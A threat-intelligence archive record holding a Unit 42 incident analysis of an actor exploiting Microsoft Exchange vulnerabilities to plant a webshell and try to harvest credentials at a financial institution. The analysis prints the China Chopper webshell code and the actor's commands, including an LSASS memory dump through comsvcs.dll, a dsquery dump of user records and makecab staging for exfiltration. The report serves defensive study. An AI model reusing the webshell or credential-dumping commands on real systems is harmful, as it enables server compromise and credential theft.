{
	"id": "efb71e38-f306-46bc-809f-964bfb89ba1e",
	"created_at": "2026-04-06T00:06:51.439739Z",
	"updated_at": "2026-04-10T13:12:40.540279Z",
	"deleted_at": null,
	"sha1_hash": "ba5c5b4a201cd3bcd09deb529df534ab917dc353",
	"title": "Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 321609,
	"plain_text": "Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR\r\nBlocks Harvesting of Credentials\r\nBy Robert Falcone\r\nPublished: 2021-04-15 · Archived: 2026-04-05 14:22:28 UTC\r\nExecutive Summary\r\nThe recently discovered and patched Microsoft Exchange vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-\r\n26858 and CVE-2021-27065) have garnered considerable attention due to their mass exploitation and the severity of impact\r\neach exploitation has on the affected organization. On March 6, 2021, an unknown actor exploited vulnerabilities in\r\nMicrosoft Exchange Server to install a webshell on a server at a financial institution in the EMEA (Europe, the Middle East\r\nand Africa) region. While we did not have access to the webshell itself, the webshell is likely a variant of the China Chopper\r\nserver-side JScript.\r\nSix days after installing the webshell on March 12, 2021, the actor used the installed webshell to run PowerShell commands\r\nto gather information from the local server and the Active Directory and stole credentials from the compromised Exchange\r\nserver. The actor then compressed the files associated with the information gathering and credential harvesting by creating\r\ncabinet files saved to a folder that the Internet Information Services (IIS) server will serve to the internet. The actor\r\nattempted to exfiltrate these cabinet files by directly navigating to them on March 12 and 13, 2021.\r\nWe analyzed the IP addresses of the inbound requests to run the commands via the webshell installed, as well as of the\r\nrequests to download the resulting files. None of the observed IP addresses appear to be actor-owned infrastructures and\r\nlikely involve a sampling of freely available proxies, VPNs and compromised servers. The IP addresses seen in the logs did\r\nnot provide any pivot points to additional activity.\r\nUnit 42 analysts believe that the actor has automated interaction with the webshell to run the two separate PowerShell\r\nscripts. The two PowerShell scripts executed via the webshell were issued three seconds apart and had two different inbound\r\nIP addresses. It appears that the automation also included the purposeful switch in IP addresses to make analyzing and\r\ncorrelating the activity more cumbersome. The automation provides a clue that the actor carried out this specific attack as\r\npart of a more extensive attack campaign.\r\nFortunately, the result of the actor's credential harvesting efforts at the financial institution in EMEA was unsuccessful, as\r\nthe inbound requests to download the memory dump from the LSASS process failed. As an additional level of protection,\r\nthe Exchange server had Cortex XDR installed with the Password Theft Protection module enabled. This removed pointers\r\nto the desired credentials from the dumped memory, which would have thwarted the actor's ability to easily extract\r\ncredentials from the memory dump using Mimikatz even if they were able to download the file successfully.\r\nIt appears that this is just one incident in a large-scale campaign either carried out by a single actor or multiple actors using a\r\ncommon toolset. Unit 42 found 177 webshells that share several common attributes and have similar behavior to the\r\nwebshell that the actor used in this incident. The organizations impacted by these related webshells were in various\r\nindustries and geographic locations, which suggests the associated actor(s) is opportunistic and likely used scanning to find\r\nExchange servers to compromise rather than having a set list of targets.\r\nPalo Alto Networks customers are protected against Microsoft Exchange Server attacks with Next-Generation Firewalls with\r\nThreat Prevention and URL Filtering security subscriptions, Cortex XDR and Cortex XSOAR.\r\nWebshell Activity\r\nUnit 42 observed an actor interacting with webshells on Microsoft Exchange servers at six different organizations on March\r\n11 and 12, 2021. To understand the actor’s activity in these attacks, we analyzed Internet Information Services (IIS) logs\r\nfrom one of the compromised Exchange servers, which allowed us to observe the inbound web requests to the webshell and\r\nthe associated process activity generated. We used the timestamps in these logs to create a timeline of activity associated\r\nwith this particular actor and incident, which we will refer to as the attack in the rest of this analysis. Figure 1 shows the\r\ntimeline, which starts from the beginning of the activity on March 6, 2021. As shown, there is a six day gap in activity\r\nbefore the post-exploitation activities kick off on March 12, 2021.\r\nhttps://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/\r\nPage 1 of 3\n\nFigure 1. Timeline of actor’s activities associated with the Exchange server.\r\nAccording to the logs, on March 6, 2021 at 2:38:16 AM, the actor installed a webshell on the Exchange server by saving the\r\nwebshell to C:\\inetpub\\wwwroot\\aspnet_client\\supp0rt.aspx. The path to the installed webshell exists within the IIS server’s\r\nroot directory, which would serve the webshell to visitors who navigate to /aspnet_client/supp0rt.aspx. The URL of\r\n/aspnet_client/supp0rt.aspx is not unique to this attack, as Unit 42 has seen this URL used for webshells in many Exchange-related attacks, as mentioned in a previous blog, “Hunting for the Recent Attacks Targeting Microsoft Exchange.” According\r\nto a recent CISA report, the supp0rt.aspx used in Exchange-related attacks was an Offline Address Book (OAB)\r\nconfiguration file with a webshell added to the “ExternalUrl” field.\r\nWhile we did not have access to the supp0rt.aspx file used in this specific attack, we were able to analyze 177 supp0rt.aspx\r\nfiles that contained similar functionality. Each of the analyzed files contained China Chopper’s server-side JScript, which\r\nwould evaluate code provided within a unique parameter whose name consists of 32 alphanumeric characters. For example,\r\nthe following code was extracted from a supp0rt.aspx webshell, which would run code provided by the actor within a\r\nparameter 54242e9b610a7ca15024a784969c9e0d:\r\n\u003cscript language=\"JScript\" runat=\"server\"\u003efunction Page_Load()\r\n{eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request.Item[\"54242e9b610a7ca15024a784969c9e0d\"])),\"unsafe\");}\r\n\u003c/script\u003e\r\nIn this attack, we observed the actor providing code to execute to the supp0rt.aspx webshell within a parameter named\r\n6b83ccc96b4abd4cea1c7c607688a8ad. We believe with high confidence that the actors used the same webshell code in these\r\nattacks, as seen above, but using the 6b83ccc96b4abd4cea1c7c607688a8ad parameter in place of\r\n54242e9b610a7ca15024a784969c9e0d. While China Chopper’s server-side JScript is readily available online, we believe\r\nthat the combination of the same webshell, the supp0rt.aspx filename and the use of a random 32-alphanumeric character\r\nparameter to run PowerShell code suggests either a common actor or shared tooling across multiple actors.\r\nWe do not know exactly which IP address the actor used to exploit the server to install the webshell, as there were several\r\nsuccessful HTTP POST requests to /ecp/program.js that attempted to exploit the Exchange vulnerability within a minute of\r\nthe supp0rt.aspx file being written to disk. The path /ecp/program.js does not appear unique to this attack, as other security\r\nresearchers have mentioned seeing this path used to exploit Exchange Server (CVE-2021-26855). All the successful requests\r\nused the user-agent ExchangeServicesClient/0.0.0.0 and came from the following IP addresses:\r\n156.194.127[.]178\r\n112.160.243[.]172\r\n221.179.87[.]175\r\n73.184.77[.]174\r\n41.237.156[.]15\r\n223.16.210[.]90\r\n63.76.255[.]110\r\n218.103.234[.]104\r\n83.110.215[.]7\r\nAfter several days of inactivity, the actor first accessed the webshell on March 12, 2021, at 2:35:27, by navigating to\r\n/aspnet_client/supp0rt.aspx from 121.150.12[.]35. The HTTP request included a parameter labeled\r\n6b83ccc96b4abd4cea1c7c607688a8ad that included a base64 encoded PowerShell script that the webshell will decode and\r\nexecute. The following script lists the running processes and returns the list between strings of oamoisjmdo and\r\nsodknousfnfdklj:\r\nvar p=System.Diagnostics.Process.GetProcesses();var str=\"\";for(var i=0;i\u003cp.Length;i++)\r\n{str+=p[i].ProcessName+\":\"+p[i].Id+\"\\r\\n\";}\r\nstr=Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(str));str=\"oamoisjmdo\"str\"sodknousfnfdklj\";Response.Write(str);\r\nThe actors enumerated the running processes to find the process identifier (PID) of the Local Security Authority Subsystem\r\nService (LSASS) process in order to dump the memory for credential harvesting. The actor will use the PID of LSASS (584,\r\nseen in a later example) within a second PowerShell script uploaded to the same webshell at /aspnet_client/supp0rt.aspx\r\nwithin the 6b83ccc96b4abd4cea1c7c607688a8ad parameter. The actor uploaded the second PowerShell to the webshell three\r\nseconds after the first on March 12, 2021, at 2:35:30, before the actor appeared to switch their IP address to use\r\n164.68.156[.]31. The short period of time between the two inbound requests to the webshell, coupled with the switching of\r\nIP addresses, suggests that the actor has automated this process to some extent. Unit 42 believes the actors automated their\r\ninteractions with the webshell to scale their operation, which allowed them to carry out post-exploitation activities on a long\r\nlist of compromised Exchange servers. The second PowerShell script contained the following, which effectively saves a\r\nbatch script to test.bat on the server and executes it by creating a cmd.exe process:\r\nSystem.IO.File.WriteAllBytes('c:\\\\inetpub\\\\wwwroot\\\\aspnet_client\r\ntest.bat',System.Convert.FromBase64String('cG93ZXJzaGVsbCBydW5kbGwzMi5leGUgYzpcd2luZG93c1xzeXN0ZW0zMlxjb21zdmNzLmRsbCBNaW\r\nvar c=new System.Diagnostics.ProcessStartInfo('cmd.exe');\r\nhttps://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/\r\nPage 2 of 3\n\nvar e=new System.Diagnostics.Process();\r\ne.StartInfo=c;\r\nc.Arguments='/c c:\\\\inetpub\\\\wwwroot\\\\aspnet_client\r\ntest.bat';\r\ne.Start();\r\nThe test.bat batch script attempted to run the following four commands, which essentially use comsvcs.dll to dump LSASS'\r\nmemory, dsquery to get more contextual information on users on the network and makecab to create cabinet files from the\r\nresults of the two previous commands for exfiltration:\r\npowershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 584\r\nc:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b1.tmp.dmp full\r\ndsquery * -limit 0 -filter objectCategory=person -attr * -uco \u003e c:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b.tmp\r\nmakecab c:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b1.tmp.dmp\r\nc:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b1.dmp.zip\r\nmakecab c:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b.tmp c:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b.dmp.zip\r\nSeveral hours later on March 12, 2021, at 10:07:09, the actor appears to have changed their IP address to 45.77.140[.]214\r\nand successfully downloaded the cabinet file f4[redacted]9b.dmp.zip that contained the results of the dsquery command.\r\nAccording to the user-agent of Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko, the actor downloaded this\r\ncabinet file by visiting the correct URL in an Internet Explorer 11 browser on a Windows 7 system. We looked at the\r\nf4[redacted]9b.dmp.zip file and found that it contained the f4[redacted]9b.tmp file, which was empty. This suggests that the\r\ndsquery command executed by the batch script did not successfully gather the user information from Active Directory.\r\nThen, one second later on March 12, 2021, at 10:07:10, the actor attempted to download the cabinet file containing the\r\nLSASS memory dump by making a GET request from 45.77.140[.]214 to /aspnet_client/f4[redacted]9b1.dmp.zip, but the\r\nserver responded with a 404 Not Found error. The actor continued to try to download this file through March 12, 2021, at\r\n17:35:15. At that point, there was a break in activity until two more requests to download the file on March 13, 2021, at\r\n05:40:05 and 05:40:06. All the requests to download the cabinet file were met with the same 404 error message.\r\nLess than 20 minutes later on March 13, 2021, at 6:02:04 AM, the actor again changed their IP address – this time to\r\n78.141.218[.]225 – and continued attempting to download this cabinet file. The actor continued their attempts until March\r\n13, 2021, at 16:33:03, issuing a total of 33 requests, all of which were met with HTTP 404 responses.\r\nWe looked at the f4[redacted]9b1.dmp file and it indeed contained the memory contents of the LSASS process, but we were\r\nunable to use Mimikatz to dump the credentials. We confirmed that the Exchange server had Cortex XDR with the Password\r\nTheft Protection module enabled, which removed a pointer to the credentials from the dump file. This suggests that even if\r\nthe actor was able to successfully download the f4[redacted]9b1.dmp.zip cabinet file that contained the memory dump, the\r\nactor would be unable to extract the sought-after credentials using Mimikatz to use in additional activities to further impact\r\nthe organization.\r\nSource: https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/\r\nhttps://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/"
	],
	"report_names": [
		"exchange-server-credential-harvesting"
	],
	"threat_actors": [],
	"ts_created_at": 1775434011,
	"ts_updated_at": 1775826760,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ba5c5b4a201cd3bcd09deb529df534ab917dc353.pdf",
		"text": "https://archive.orkl.eu/ba5c5b4a201cd3bcd09deb529df534ab917dc353.txt",
		"img": "https://archive.orkl.eu/ba5c5b4a201cd3bcd09deb529df534ab917dc353.jpg"
	}
}